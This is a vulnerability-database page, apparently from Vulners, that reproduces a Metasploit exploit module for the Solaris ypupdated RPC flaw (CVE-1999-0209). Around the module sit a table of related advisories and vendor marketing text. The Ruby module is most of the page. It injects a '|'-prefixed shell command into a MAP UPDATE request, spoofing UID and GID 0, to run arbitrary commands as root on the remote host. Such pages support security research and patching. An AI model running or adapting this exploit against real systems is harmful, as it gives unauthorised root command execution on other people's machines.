Lucene search
K

Solaris ypupdated Command Execution

🗓️ 18 Apr 2008 01:33:09Reported by I)ruid <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 33 Views

Solaris ypupdated Command Execution. Weakness in ypupdated RPC allows command execution as roo

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit (meta)
4 Apr 200800:00
zdt
Circl
CVE-1999-0209
4 Apr 200800:00
circl
CVE
CVE-1999-0209
29 Sep 199904:00
cve
Cvelist
CVE-1999-0209
29 Sep 199904:00
cvelist
Exploit DB
Solaris - ypupdated Command Execution (Metasploit)
25 Jul 201000:00
exploitdb
Exploit DB
Sun Solaris 10 - rpc.ypupdated Remote Code Execution (Metasploit)
4 Apr 200800:00
exploitdb
exploitpack
Sun Solaris 10 - rpc.ypupdated Remote Code Execution (Metasploit)
4 Apr 200800:00
exploitpack
NVD
CVE-1999-0209
14 Aug 199004:00
nvd
Packet Storm
CAU-EX-2008-0001.txt
8 Apr 200800:00
packetstorm
Packet Storm
Solaris ypupdated Command Execution
28 Oct 200900:00
packetstorm
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SunRPC

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Solaris ypupdated Command Execution',
      'Description'    => %q{
        This exploit targets a weakness in the way the ypupdated RPC
        application uses the command shell when handling a MAP UPDATE
        request.  Extra commands may be launched through this command
        shell, which runs as root on the remote host, by passing
        commands in the format '|<command>'.

        Vulnerable systems include Solaris 2.7, 8, 9, and 10, when
        ypupdated is started with the '-i' command-line option.
      },
      'Author'         => [ 'I)ruid <druid[at]caughq.org>' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '1999-0209'],
          ['OSVDB', '11517'],
          ['BID', '1749'],
        ],
      'Privileged'     => true,
      'Platform'       => %w{ solaris unix },
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'    => 1024,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet',
            }
        },
      'Targets'        => [ ['Automatic', { }], ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '1994-12-12'
    ))

    register_options(
      [
        OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),
        OptInt.new('GID', [false, 'GID to emulate', 0]),
        OptInt.new('UID', [false, 'UID to emulate', 0])
      ], self.class
    )
  end

  def exploit
    hostname  = datastore['HOSTNAME']
    program   = 100028
    progver   = 1
    procedure = 1

    print_status('Sending PortMap request for ypupdated program')
    pport = sunrpc_create('udp', program, progver)

    print_status("Sending MAP UPDATE request with command '#{payload.encoded}'")
    print_status('Waiting for response...')
    sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
    command = '|' + payload.encoded
    msg = Rex::Encoder::XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
    sunrpc_call(procedure, msg)

    sunrpc_destroy

    print_status('No Errors, appears to have succeeded!')
  rescue ::Rex::Proto::SunRPC::RPCTimeout
    print_warning('Warning: ' + $!)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
7.7High risk
Vulners AI Score7.7
CVSS 25
EPSS0.4853
33